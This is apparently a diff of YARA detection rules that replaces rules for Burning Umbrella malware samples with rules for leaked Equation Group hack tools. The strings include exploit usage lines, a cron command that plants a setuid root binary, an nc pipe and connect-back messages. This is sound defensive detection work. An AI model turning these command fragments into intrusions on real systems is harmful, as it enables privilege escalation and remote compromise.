+		logic_hash = "aa7fda8b95b697bb0541642677579f9db9df379048421481cdb66068032bf681"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dd01e7a1c9b20d36ea2d961737780f2c0d56005c370e50247e38c5ca80dcaa4f"
+		hash1 = "4962b307a42ba18e987d82aa61eba15491898978d0e2f0e4beb02371bf0fd5b4"
 
 	strings:
-		$x1 = "ncProxyXll" fullword ascii
-		$s1 = "Uniscribe.dll" fullword ascii
-		$s2 = "GetModuleFileNameDll" fullword ascii
-		$s4 = "$Hangzhou Shunwang Technology Co.,Ltd0" fullword ascii
+		$s1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"" fullword ascii
+		$s2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii
+		$s3 = "echo \"Call back port2 = ${SPORT}\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "de481441d675e9aca4f20bd8e16a5faa" or pe.exports ( "PerfectWorld" ) or pe.exports ( "ncProxyXll" ) or 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x2123 and filesize < 4KB and 1 of them )
 }
-rule SIGNATURE_BASE_B374K_Back_Connect : FILE
+rule SIGNATURE_BASE_Equationgroup_Elgingamble
 {
 	meta:
-		description = "Detects privilege escalation tool"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file elgingamble"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8612bda2-2576-56c0-a4ba-afbef419ab05"
-		date = "2016-08-18"
+		id = "fc8a63a1-9deb-5051-a02d-ed26fd1cae95"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "Internal Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_b374k_extra.yar#L8-L24"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L362-L378"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dd89aefb6c1add44bfe2a706cd161a16f36a649f910ace16b641a7836525aa73"
-		score = 80
+		logic_hash = "e561794d969b6198f71115087db8cc89043f2079252eef22458450e16596b0eb"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c8e16f71f90bbaaef27ccaabb226b43762ca6f7e34d7d5585ae0eb2d36a4bae5"
+		hash1 = "0573e12632e6c1925358f4bfecf8c263dd13edf52c633c9109fe3aae059b49dd"
 
 	strings:
-		$s1 = "AddAtomACreatePro" fullword ascii
-		$s2 = "shutdow" fullword ascii
-		$s3 = "/config/i386" fullword ascii
+		$x1 = "* * * * * root chown root %s; chmod 4755 %s; %s" fullword ascii
+		$x2 = "[-] kernel not vulnerable" fullword ascii
+		$x3 = "[-] failed to spawn shell: %s" fullword ascii
+		$x4 = "-s shell           Use shell instead of %s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 10KB and all of them )
+		1 of them
 }
-
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Cmsd : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file cmsd"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9f8a6831-172b-5310-9763-43657b79b91d"
-		date = "2018-05-04"
+		id = "9cdd3562-fed4-5b79-b056-049279404eeb"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L13-L31"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L380-L397"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d8ed432fea930eb9b4d695a4a68b833f4324fe0bbea3f0ccac2fe5934bfa1c22"
+		logic_hash = "2b9c7ef750c2e45df7839395db51c93204bc9855f5de05bd59c50bb6a964bc8b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fcfe8fcf054bd8b19226d592617425e320e4a5bb4798807d6f067c39dfc6d1ff"
+		hash1 = "634c50614e1f5f132f49ae204c4a28f62a32a39a3446084db5b0b49b564034b8"
 
 	strings:
-		$s1 = { 40 00 00 E0 75 68 66 61 6F 68 6C 79 }
-		$s2 = { 40 00 00 E0 64 6A 7A 66 63 6D 77 62 }
+		$x1 = "usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]" fullword ascii
+		$x2 = "error: not vulnerable" fullword ascii
+		$s1 = "port=%d connected! " fullword ascii
+		$s2 = "xxx.XXXXXX" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4000KB and ( pe.imphash ( ) == "baa93d47220682c04d92f7797d9224ce" and $s1 in ( 0 .. 1024 ) and $s2 in ( 0 .. 1024 ) )
+		( uint16( 0 ) == 0x457f and filesize < 30KB and 1 of ( $x* ) ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Ebbshave : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5"
 		author = "Florian Roth (Nextron Systems)"
-		id = "926b4a29-ce47-559b-94e3-1fabd90f3fbe"
-		date = "2018-05-04"
+		id = "6d4c14e2-afb1-57ce-91df-cb024258250e"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L33-L51"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L399-L415"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0c298176e5849b2b202089f27cffb7646243d19a90898bbf079a97d2f624a27e"
+		logic_hash = "8a1a5ddefc646dc55161eb9b2a1b0e4176df7e99660db48b245af3ef9ab0871c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "801a64a730fc8d80e17e59e93533c1455686ca778e6ba99cf6f1971a935eda4c"
+		hash1 = "eb5e0053299e087c87c2d5c6f90531cc1946019c85a43a2998c7b66a6f19ca4b"
 
 	strings:
-		$s1 = { 40 00 00 E0 63 68 72 6F 6D 67 75 78 }
-		$s2 = { 40 00 00 E0 77 62 68 75 74 66 6F 61 }
-		$s3 = "ActiveX Manager" wide
+		$s1 = "executing ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s" fullword ascii
+		$s2 = "./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772" fullword ascii
+		$s3 = "version 1 - Start with option #18 first, if it fails then try this option" fullword ascii
+		$s4 = "%s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and $s1 in ( 0 .. 1024 ) and $s2 in ( 0 .. 1024 ) and $s3
+		( uint16( 0 ) == 0x457f and filesize < 20KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_3 : FILE
+rule SIGNATURE_BASE_Equationgroup_Eggbasket : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file eggbasket"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b997822a-3f62-51b4-bd96-e780ffe60812"
-		date = "2018-05-04"
+		id = "3fb1388a-e6b8-5c7a-ad23-ddbfc9d33d56"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L53-L66"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L417-L432"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ad39864eec58b1c655bd3d510faa314702d118cee845da55d189e7252174eafb"
+		logic_hash = "e4800d5c820a18d3483dc5c055c0e2f5374ce3b160ecb4d940a00ec4a90ca50d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "92efbecc24fbb5690708926b6221b241b10bdfe3dd0375d663b051283d0de30f"
+		hash1 = "b078a02963610475217682e6e1d6ae0b30935273ed98743e47cc2553fbfd068f"
 
 	strings:
-		$s1 = "HKEY_CLASSES_ROOT\\Word.Document.8\\shell\\Open\\command" fullword ascii
+		$x1 = "# Building Shellcode into exploit." fullword ascii
+		$x2 = "%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\"  -d 10.0.0.1 -p 80" fullword ascii
+		$x3 = "# STARTING EXHAUSTIVE ATTACK AGAINST " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
+		( uint16( 0 ) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them )
 }
-
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_4 : FILE
+rule SIGNATURE_BASE_Equationgroup_Jparsescan : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file jparsescan"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3489f64b-7ebc-55b8-bd11-afaa719e572b"
-		date = "2018-05-04"
+		id = "6b6a884e-0bbc-54f5-bb6c-00e15ca95250"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L68-L99"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L434-L448"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1889ce1101ebb352c33279d40641f1f2312c45c6f7e267f4912a9faf320e5971"
+		logic_hash = "d86b6757abb5ad1902e91f100e6a6bea52e6e14684d184b6b8138270484275f4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a1629e8abce9d670fdb66fa1ef73ad4181706eefb8adc8a9fd257b6a21be48c6"
+		hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984"
 
 	strings:
-		$x1 = "dumpodbc.exe" fullword ascii
-		$x2 = "photo_Bundle.exe" fullword ascii
-		$x3 = "Connect 2 fails : %d,%s:%d" fullword ascii
-		$x4 = "Connect fails 1 : %d %s:%d" fullword ascii
-		$x5 = "New IP : %s,New Port: %d" fullword ascii
-		$x6 = "Micrsoft Corporation. All rights reserved." fullword wide
-		$x7 = "New ConFails : %d" fullword ascii
-		$s1 = "cmd /c net stop stisvc" fullword ascii
-		$s2 = "cmd /c net stop spooler" fullword ascii
-		$s3 = "\\temp\\s%d.dat" ascii
-		$s4 = "cmd /c net stop wuauserv" fullword ascii
-		$s5 = "User-Agent: MyApp/0.1" fullword ascii
-		$s6 = "%s->%s Fails : %d" fullword ascii
-		$s7 = "Enter WorkThread,Current sock:%d" fullword ascii
+		$s1 = "Usage:  $prog [-f directory] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii
+		$s2 = "$gotsunos = ($line =~ /program version netid     address             service         owner/ );" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and ( ( pe.exports ( "Print32" ) and 2 of them ) or 1 of ( $x* ) or 4 of them )
+		( filesize < 40KB and 1 of them )
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_6 : FILE
+rule SIGNATURE_BASE_Equationgroup_Sambal : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file sambal"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7198a734-fd54-5cb5-9966-b91796a415c7"
-		date = "2018-05-04"
+		id = "b02b442c-3e24-55f8-aa5c-926c3a3a75b4"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L101-L115"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L450-L467"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ee671bc09cc0c84c9817ed800f1416a75f18a70fd2cf6a7e9f063fffa01fa003"
+		logic_hash = "6066332b16996a9d8635d3752f46c6529cfc2c94d3d6f0c9791f2068c982bf3e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "49ef2b98b414c321bcdbab107b8fa71a537958fe1e05ae62aaa01fe7773c3b4b"
+		hash1 = "2abf4bbe4debd619b99cb944298f43312db0947217437e6b71b9ea6e9a1a4fec"
 
 	strings:
-		$s1 = "ExecuteFile=\"hidcon:nowait:\\\"Word\\\\r.bat\\\"\"" fullword ascii
-		$s2 = "InstallPath=\"%Appdata%\\\\Microsoft\"" fullword ascii
+		$s1 = "+ Bruteforce mode." fullword ascii
+		$s3 = "+ Host is not running samba!" fullword ascii
+		$s4 = "+ connecting back to: [%d.%d.%d.%d:45295]" fullword ascii
+		$s5 = "+ Exploit failed, try -b to bruteforce." fullword ascii
+		$s7 = "Usage: %s [-bBcCdfprsStv] [host]" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+		( uint16( 0 ) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them )
 }
-
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_7 : FILE
+rule SIGNATURE_BASE_Equationgroup_Pclean_V2_1_1_2 : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file pclean.v2.1.1.0-linux-i386"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7e427512-a8ee-53ae-a141-e995e74ca845"
-		date = "2018-05-04"
+		id = "1b31af01-8c30-513a-a615-82dcb940e06d"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L117-L130"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L469-L483"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "115774c17003408a04e4b2678f32392b5439b55f3d4688476f6f877520acf75d"
+		logic_hash = "9323ef0c76348d242b010cf0f1c6a1bf5dd120a02418350bb0ed137f468ac624"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a4ce3a356d61fbbb067e1430b8ceedbe8965e0cfedd8fb43f1f719e2925b094a"
-		hash2 = "a8bfc1e013f15bc395aa5c047f22ff2344c343c22d420804b6d2f0a67eb6db64"
-		hash3 = "959612f2a9a8ce454c144d6aef10dd326b201336a85e69a604e6b3892892d7ed"
+		hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97"
+
+	strings:
+		$s3 = "** SIGNIFICANTLY IMPROVE PROCESSING TIME" fullword ascii
+		$s6 = "-c cmd_name:     strncmp() search for 1st %d chars of commands that " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and pe.imphash ( ) == "f5b113d6708a3927b5cc48f2215fcaff"
+		( uint16( 0 ) == 0x457f and filesize < 40KB and all of them )
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_8 : FILE
+rule SIGNATURE_BASE_Equationgroup_Envisioncollision : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file envisioncollision"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1b89d5a1-1425-5cb7-b429-563769bc0943"
-		date = "2018-05-04"
+		id = "8d512d9a-45a5-514a-bee1-a364beeaf560"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L132-L145"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L485-L501"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1a42667463ff006b155c93b8986ab75441ba00d0c3c146c2d4c6929250627d8d"
+		logic_hash = "8cd8c24b212ca71feb6093682fc614c88790c10d7c7d72dac65b047e5791894a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "73270fe9bca94fead1b5b38ddf69fae6a42e574e3150d3e3ab369f5d37d93d88"
+		hash1 = "75d5ec573afaf8064f5d516ae61fd105012cbeaaaa09c8c193c7b4f9c0646ea1"
 
 	strings:
-		$s1 = "cmd /c open %s" fullword ascii
+		$x1 = "mysql \\$D --host=\\$H --user=\\$U --password=\\\"\\$P\\\" -e \\\"select * from \\$T" fullword ascii
+		$x2 = "Window 3: $0 -Uadmin -Ppassword -i127.0.0.1 -Dipboard -c\\\"sleep 500|nc" fullword ascii
+		$s3 = "$ua->agent(\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\");" fullword ascii
+		$s4 = "$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
+		( uint16( 0 ) == 0x2123 and filesize < 20KB and 1 of ( $x* ) ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_10 : FILE
+rule SIGNATURE_BASE_Equationgroup_Cmsex : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file cmsex"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e4cb2211-efbe-55f9-99e3-c01601904509"
-		date = "2018-05-04"
+		id = "9a1051a5-3f31-5fc2-85a0-beb2dea962d6"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L147-L163"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L503-L520"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "14d0ab1114c168d7222a49e68ba12718b6285969e667b95be665d59b1fc98358"
+		logic_hash = "997e08a49c5ae82bcc590e5febd449a4d3e9098f5aa154ccc0824b976f0a6365"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "70992a72412c5d62d003a29c3967fcb0687189d3290ebbc8671fa630829f6694"
-		hash2 = "48f0bbc3b679aac6b1a71c06f19bb182123e74df8bb0b6b04ebe99100c57a41e"
-		hash3 = "5475ae24c4eeadcbd49fcd891ce64d0fe5d9738f1c10ba2ac7e6235da97d3926"
+		hash1 = "2d8ae842e7b16172599f061b5b1f223386684a7482e87feeb47a38a3f011b810"
 
 	strings:
-		$s1 = "revjj.syshell.org" fullword ascii
+		$x1 = "Usage: %s -i <ip_addr/hostname> -c <command> -T <target_type> (-u <port> | -t <port>) " fullword ascii
+		$x2 = "-i target ip address / hostname " fullword ascii
+		$x3 = "Note: Choosing the correct target type is a bit of guesswork." fullword ascii
+		$x4 = "Solaris rpc.cmsd remote root exploit" fullword ascii
+		$x5 = "If one choice fails, you may want to try another." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		( uint16( 0 ) == 0x457f and filesize < 50KB and 1 of ( $x* ) ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_11 : FILE
+rule SIGNATURE_BASE_Equationgroup_Exze : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file exze"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9762c68c-4d69-5d38-aaf4-0048e7404147"
-		date = "2018-05-04"
+		id = "d452b952-0c4a-501b-93f5-064d13f2c08e"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L165-L178"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L522-L537"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "847681b3e9d4fc38c483663f5a7e16e7f8f95cfa77728d7316edbe6fbf5fe2c1"
+		logic_hash = "b8678f58da689be9507a345b6b80ece6cdb7a78d73db339bdc15ad0a66b4a2e6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "278e9d130678615d0fee4d7dd432f0dda6d52b0719649ee58cbdca097e997c3f"
+		hash1 = "1af6dde6d956db26c8072bf5ff26759f1a7fa792dd1c3498ba1af06426664876"
 
 	strings:
-		$s1 = "Resume.app/Contents/Java/Resume.jarPK" fullword ascii
+		$s1 = "shellFile" fullword ascii
+		$s2 = "completed.1" fullword ascii
+		$s3 = "zeke_remove" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 700KB and 1 of them
+		( uint16( 0 ) == 0x457f and filesize < 80KB and all of them )
 }
-
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_12 : FILE
+rule SIGNATURE_BASE_Equationgroup_DUL : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file DUL"
 		author = "Florian Roth (Nextron Systems)"
-		id = "805a00e7-2959-53d8-b769-0f8e54e1bbd5"
-		date = "2018-05-04"
+		id = "6dd90b30-30cb-531c-b8e2-fc208b21e8e6"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L180-L201"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L539-L553"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "31798a39d10bfa4520d91e1f555302e9ac4e38d90f8bc27376a5e7e1ccfcc5e1"
+		logic_hash = "55df9a844352babf0c30075139e2a62cbf9db898280546d27b172e4d611ce1c0"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b9aba520eeaf6511877c1eec5f7d71e0eea017312a104f30d3b8f17c89db47e8"
-
-	strings:
-		$s1 = "%SystemRoot%\\System32\\qmgr.dll" fullword ascii
-		$s2 = "rundll32.exe %s,Startup" fullword ascii
-		$s3 = "nvsvcs.dll" fullword wide
-		$s4 = "SYSTEM\\CurrentControlSet\\services\\BITS\\Parameters" fullword ascii
-		$s5 = "http://www.sginternet.net 0" fullword ascii
-		$s6 = "Microsoft Corporation. All rights reserved." fullword wide
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "24d1d50960d4ebf348b48b4db4a15e50f328ab2c0e24db805b106d527fc5fe8e"
+
+	strings:
+		$x1 = "?Usage: %s <shellcode> <output_file>" fullword ascii
+		$x2 = "Here is the decoder+(encoded-decoder)+payload" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 80KB and ( pe.exports ( "SvcServiceMain" ) and 5 of them )
+		( uint16( 0 ) == 0x457f and filesize < 80KB and 1 of them ) or ( all of them )
 }
-
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_13 : FILE
+rule SIGNATURE_BASE_Equationgroup_Slugger2 : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file slugger2"
 		author = "Florian Roth (Nextron Systems)"
-		id = "38c73425-bbdd-5b74-8ad4-5e0052039dd8"
-		date = "2018-05-04"
+		id = "3787a39e-0123-5b46-90c9-6b772b1fd96c"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L203-L215"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L555-L574"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8cc611685a822e0484146a08f4ebc2fa8dd260dc8627929333060696d8dc35ce"
+		logic_hash = "3c736fdfa96d5e99bc4d093c03a81b8a4f58501ec8c03a2891f9f694d88b5284"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d31374adc0b96a8a8b56438bbbc313061fd305ecee32a12738dd965910c8890f"
-		hash2 = "c74a8e6c88f8501fb066ae07753efe8d267afb006f555811083c51c7f546cb67"
+		hash1 = "a6a9ab66d73e4b443a80a69ef55a64da7f0af08dfaa7e17eb19c327301a70bdf"
+
+	strings:
+		$x1 = "usage: %s hostip port cmd [printer_name]" fullword ascii
+		$x2 = "command must be less than 61 chars" fullword ascii
+		$s1 = "__rw_read_waiting" ascii
+		$s2 = "completed.1" fullword ascii
+		$s3 = "__mutexkind" ascii
+		$s4 = "__rw_pshared" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "75f201aa8b18e1c4f826b2fe0963b84f"
+		( uint16( 0 ) == 0x457f and filesize < 50KB and ( 4 of them and 1 of ( $x* ) ) ) or ( all of them )
